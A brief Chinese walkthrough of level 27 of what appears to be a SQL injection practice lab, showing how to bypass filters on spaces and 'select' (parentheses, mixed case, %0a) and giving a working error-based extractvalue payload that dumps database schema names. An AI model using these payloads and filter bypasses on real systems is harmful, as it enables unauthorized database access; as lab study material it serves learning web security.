第二十七关:
这关禁用了空格和select,空格还是可以使用()代替,select发现可以大小写绕过
输入?id=1'||extractvalue(1,concat(0x5c,(selEct(group_concat(schema_name))from(information_schema.schemata))))||'1'='1
这里还有个问题就是,空格被过滤了,貌似不能使用联合注入了。网上有人说可以使用%0a ,是可以的
还可以使用内联注释的/*! content */ 但是这关过滤了/* 所以不行,不过我在第一关中尝试了 是可以的